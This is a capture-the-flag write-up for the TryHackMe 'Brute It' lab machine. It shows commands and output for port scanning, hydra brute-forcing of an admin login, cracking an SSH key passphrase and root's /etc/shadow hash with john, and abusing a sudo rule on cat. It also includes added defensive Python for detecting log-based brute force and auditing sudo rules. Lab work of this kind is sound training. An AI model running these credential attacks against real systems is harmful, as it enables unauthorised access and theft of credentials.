Nmap

First we scan for open ports

# nmap -p- -T4 -sV -sC 10.10.125.81 -oA nmap
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-02 19:29 BST
Nmap scan report for 10.10.125.81
Host is up (0.020s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:0e:bf:14:fa:54:b3:5c:44:15:ed:b2:5d:a0:ac:8f (RSA)
|   256 d0:3a:81:55:13:5e:87:0c:e8:52:1e:cf:44:e0:3a:54 (ECDSA)
|_  256 da:ce:79:e0:45:eb:17:25:ef:62:ac:98:f0:cf:bb:04 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.68 seconds

Website

We can see a website is running, but it only serves the standard Apache holding page, so we run a gobuster scan to find any other directories.

# gobuster dir -u http://10.10.125.81 -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.125.81
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd            (Status: 403) [Size: 277]
/admin                (Status: 301) [Size: 312] [--> http://10.10.125.81/admin/]
/.htaccess            (Status: 403) [Size: 277]
/.hta                 (Status: 403) [Size: 277]
/index.html           (Status: 200) [Size: 10918]
/server-status        (Status: 403) [Size: 277]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

Browsing to the admin directory we see a login box, and the page source reveals the username.

We don't have the password, though, so we can try brute-forcing it with hydra.

# hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.125.81 http-post-form '/admin/index.php:user=^USER^&pass=^PASS^:F=<p>Username or password invalid</p>' 
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-08-02 19:56:09
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.125.81:80/admin/index.php:user=^USER^&pass=^PASS^:F=<p>Username or password invalid</p>
[80][http-post-form] host: 10.10.125.81   login: admin   password: ******
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-08-02 19:56:21
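A login form hit like this is loud in the web server's access log: one client, one path, hundreds of POSTs in seconds. Added example (not from the original write-up): a sliding-window detector over constructed Apache access-log lines that flags any source IP sending at least a threshold of POSTs to /admin/index.php within a window; the sample lines, client IPs, threshold and window are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Apache common/combined log format: client IP, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec

def find_bruteforce(lines, login_path="/admin/index.php", threshold=20, window_s=60):
    """Return {ip: peak count} for clients that POST to login_path at least
    `threshold` times inside any `window_s`-second sliding window."""
    recent = defaultdict(deque)   # ip -> timestamps of POSTs still inside the window
    peak = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or rec["path"] != login_path:
            continue
        q = recent[rec["ip"]]
        q.append(rec["ts"])
        while (rec["ts"] - q[0]).total_seconds() > window_s:
            q.popleft()
        if len(q) >= threshold:
            peak[rec["ip"]] = max(peak.get(rec["ip"], 0), len(q))
    return peak

def sample_log():
    """Constructed log lines (assumption, not from the box): one client fires 25 POSTs at
    the login form in nine seconds, while another client submits the form once."""
    lines = ['10.10.14.7 - - [02/Aug/2025:19:50:01 +0100] "GET /admin/ HTTP/1.1" 200 1038']
    for i in range(25):
        lines.append('10.10.14.7 - - [02/Aug/2025:19:56:%02d +0100] '
                     '"POST /admin/index.php HTTP/1.1" 200 1075' % (9 + i // 3))
    lines.append('10.10.14.9 - - [02/Aug/2025:19:57:30 +0100] "POST /admin/index.php HTTP/1.1" 200 1075')
    return lines

if __name__ == "__main__":
    print(find_bruteforce(sample_log()))   # {'10.10.14.7': 25}
```

Feed it real lines with `find_bruteforce(open("/var/log/apache2/access.log"))`; the same logic is what a fail2ban filter or WAF rate rule implements for this endpoint.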

With the discovered password we can log in. This reveals a flag and an RSA private key for john, which we can download.

SSH

The key we downloaded is passphrase-protected, so to use it we will need to crack the passphrase. We extract the hash with ssh2john and crack it with john.

# ssh2john id_rsa > id_rsa.hash        

# john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
**********       (id_rsa)     
1g 0:00:00:00 DONE (2025-08-02 20:03) 25.00g/s 1815Kp/s 1815Kc/s 1815KC/s saloni..rock14
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

With this password we can log in as john using the key and get the user flag.

# ssh john@10.10.125.81 -i id_rsa
Enter passphrase for key 'id_rsa': 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-118-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat Aug  2 19:05:00 UTC 2025

  System load:  0.0                Processes:           109
  Usage of /:   25.7% of 19.56GB   Users logged in:     0
  Memory usage: 21%                IP address for ens5: 10.10.125.81
  Swap usage:   0%


63 packages can be updated.
0 updates are security updates.


Last login: Wed Sep 30 14:06:18 2020 from 192.168.1.106
john@bruteit:~$ ls
user.txt
john@bruteit:~$ cat user.txt 
THM{a*************************r}

Privilege escalation

Checking john's privileges we see they can run cat as root via sudo without a password. This means we can simply cat out the root flag.

john@bruteit:~$ sudo -l
Matching Defaults entries for john on bruteit:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User john may run the following commands on bruteit:
    (root) NOPASSWD: /bin/cat
john@bruteit:~$ sudo cat /root/root.txt
THM{p******************n}
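The rule above is the whole privilege escalation: an unrestricted file reader as root reads /root/root.txt and /etc/shadow just as easily. Added example, not part of the original write-up: a Python parser for sudo -l output in the form shown that flags rules granting root a file-reading binary with no fixed arguments; SAMPLE reproduces the page's rule, and the FILE_READERS set is an assumption to be extended from local policy.

```python
import re
import shlex

# Binaries that, run as root without argument restriction, read any file (e.g. /etc/shadow).
# Constructed list for this example; extend it from local policy.
FILE_READERS = {"cat", "tac", "head", "tail", "less", "more", "base64", "xxd"}

# One privilege line of `sudo -l` output, e.g. "    (root) NOPASSWD: /bin/cat"
RULE_RE = re.compile(r'^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$')

def parse_sudo_l(text):
    """Return the rules listed after 'may run the following commands' as dicts."""
    rules, in_cmds = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_cmds = True
            continue
        m = RULE_RE.match(line) if in_cmds else None
        if m is None:
            continue
        tags = {t.strip() for t in m["tags"].split(":") if t.strip()}
        runas_user = m["runas"].split(":")[0].strip()   # "(ALL : ALL)" -> "ALL"
        for cmd in m["cmds"].split(","):
            rules.append({"runas": runas_user, "tags": tags, "argv": shlex.split(cmd)})
    return rules

def audit(rules):
    """Flag rules that grant root an unrestricted file-reading binary."""
    findings = []
    for r in rules:
        prog = r["argv"][0].rsplit("/", 1)[-1] if r["argv"] else ""
        as_root = r["runas"] in ("root", "ALL")
        unrestricted = len(r["argv"]) == 1      # no fixed arguments in the rule
        if as_root and prog in FILE_READERS and unrestricted:
            msg = f"{r['argv'][0]} as root with no argument restriction"
            if "NOPASSWD" in r["tags"]:
                msg += " and NOPASSWD"
            findings.append(msg)
    return findings

# The sudo -l output shown on the page for john, reproduced as the sample input.
SAMPLE = """Matching Defaults entries for john on bruteit:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User john may run the following commands on bruteit:
    (root) NOPASSWD: /bin/cat
"""
```

Run `audit(parse_sudo_l(SAMPLE))` to get the finding for john; a rule that pins the argument, such as /bin/cat /var/log/app.log, is not flagged, which is the shape a least-privilege sudoers entry should take.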

However, we are also asked for root's password. Using cat again, we can dump /etc/shadow and crack root's hash to reveal it.

john@bruteit:~$ sudo cat /etc/shadow
root:$6$zdk0.jUm$Vya24cGzM1duJkwM5b17Q205xDJ47LOAg/OpZvJ1gKbLF8PJBdKJA4a6M.JYPUTAaWu4infDjI88U9yUXEVgL.:18490:0:99999:7:::

...
...
# john root.txt --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
f******l      (root)     
1g 0:00:00:00 DONE (2025-08-02 20:13) 11.11g/s 2844p/s 2844c/s 2844C/s 123456..freedom
Use the "--show" option to display all of the cracked passwords reliably
Session completed.